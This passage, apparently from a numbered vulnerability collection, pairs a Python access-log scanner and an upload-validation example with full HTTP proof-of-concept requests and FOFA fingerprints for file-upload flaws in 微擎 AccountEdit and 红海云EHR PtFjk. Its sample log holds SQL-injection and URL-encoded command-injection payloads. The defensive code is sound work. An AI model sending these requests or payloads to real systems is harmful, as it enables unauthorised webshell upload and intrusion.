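            parts.append(seg.split(";", 1)[0])
    out = "/" + "/".join(parts)
    if path.endswith("/") and parts:
        out += "/"
    return out


def scan_access_log(lines):
    """Return one finding per line that hits a listed endpoint or carries a
    payload fragment. Both checks run on every line, so a known payload aimed
    at an unlisted path is still reported."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        path = target.partition("?")[0]
        reasons = []
        item = ENDPOINTS.get(normalize_path(path))
        if item:
            reasons.append("endpoint: " + item)
        decoded = unquote_plus(target)
        for pattern, label in PAYLOAD_PATTERNS:
            if pattern.search(decoded):
                reasons.append(label)
        if reasons:
            findings.append({
                "line": lineno, "ip": m.group("ip"), "method": m.group("method"),
                "path": path, "status": m.group("status"), "reasons": reasons,
            })
    return findings


# Constructed sample lines (not real traffic): the request targets are the ones
# quoted in items 190, 191, 197, 198 and 200, plus one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2024:08:12:01 +0800] "POST /index.php/admin/Userinfo/poihuoqu HTTP/1.1" 200 1452',
    '203.0.113.5 - - [10/Jun/2024:08:12:07 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 87',
    '198.51.100.7 - - [10/Jun/2024:08:13:22 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Jun/2024:08:14:03 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 12',
    '192.0.2.9 - - [10/Jun/2024:08:15:40 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 40',
    '192.0.2.9 - - [10/Jun/2024:08:16:00 +0800] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["line"], f["ip"], f["method"], f["path"], f["status"], "; ".join(f["reasons"]))
```

Run against a real log with scan_access_log(open("access.log").readlines()). Endpoint hits for the POST-based items should be followed by a look at the matching response sizes and status codes, since the access log alone cannot show what was in the body.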
202. 微擎系统 AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values from the page:

GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above into the upload request:

POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA: body="RedseaPlatform"
The declared Content-Type (image/jpeg) is accepted without being checked against either the content or the .jsp extension:

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
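Items 192, 194, 199, 202 and 203 are all the same class of defect: an upload endpoint that trusts the client-supplied file name, extension or Content-Type. The following is an added example of the server-side checks that close each of those gaps; it is written for this page and is not code from any of the products above. The accepted extension list, the magic-byte table and the sample inputs are assumptions chosen for the illustration.

```python
import os
import re
import secrets

# Extensions this (hypothetical) service accepts, with the magic bytes each
# must start with. None means the type has no fixed signature (plain text).
ALLOWED_TYPES = {
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".pdf": b"%PDF-",
    ".txt": None,
}

# Markers that would turn a text upload into a script if a lenient handler ever
# interprets it: JSP/ASPX <% ... %>, PHP <?php, inline <script>.
SCRIPT_MARKERS = re.compile(rb"<\?php|<%|<script", re.I)


def vet_upload(client_filename, client_content_type, data):
    """Return (stored_name, None) for an accepted upload or (None, reason) for a
    rejected one. client_content_type is deliberately unused: item 203 ships a
    JSP declared as image/jpeg, so the declared type is never trusted."""
    # 1. Strip every path component: "../../../../../jboss/web/fe.war/hello.jsp"
    #    (item 194) becomes "hello.jsp". Backslashes count as separators too.
    name = os.path.basename(client_filename.replace("\\", "/"))
    # 2. Judge by the final extension, lower-cased, against the allowlist:
    #    .jsp, .php, .ashx, "shell.jpg.jsp" and ".htaccess" are all rejected,
    #    and the extension is never taken from a second parameter such as the
    #    name=.ashx query string of item 192.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        return None, "extension %s not allowed" % (ext or "(none)")
    # 3. Content must match the signature the extension implies.
    magic = ALLOWED_TYPES[ext]
    if magic is not None and not data.startswith(magic):
        return None, "content does not match %s signature" % ext
    # 4. Text uploads must not carry script markers.
    if magic is None and SCRIPT_MARKERS.search(data):
        return None, "script markers in text upload"
    # 5. The server, not the client, chooses the stored name.
    return secrets.token_hex(16) + ext, None


def inside_upload_dir(upload_dir, stored_name):
    """True only if upload_dir/stored_name resolves to a file strictly below
    upload_dir; a second guard in case a stored name is ever derived from
    client input."""
    root = os.path.abspath(upload_dir)
    dest = os.path.abspath(os.path.join(root, stored_name))
    return dest != root and os.path.commonpath([root, dest]) == root


if __name__ == "__main__":
    # Constructed inputs mirroring the uploads in items 194, 199, 203 and 202.
    samples = [
        ("../../../../../jboss/web/fe.war/hello.jsp", "text/plain", b'<% out.println("hello");%>'),
        ("tttt.php", "text/php", b'<?php echo "tttt";unlink(__FILE__);?>'),
        ("11.jsp", "image/jpeg", b'<% out.print("hello,eHR");%>'),
        ("1123.txt", "text/plain", b"Hello World!"),
        ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ]
    for fname, ctype, body in samples:
        print(fname, "->", vet_upload(fname, ctype, body))
```

The order of the checks matters: the extension decision is made after basename() and before any content inspection, so a traversal prefix can never reach the filesystem and a polyglot file (valid JPEG header followed by script) still lands under a server-chosen name with an image extension, where nothing executes it. Keeping the upload directory outside the web root, or serving it with script execution disabled, remains the backstop for everything this function misses.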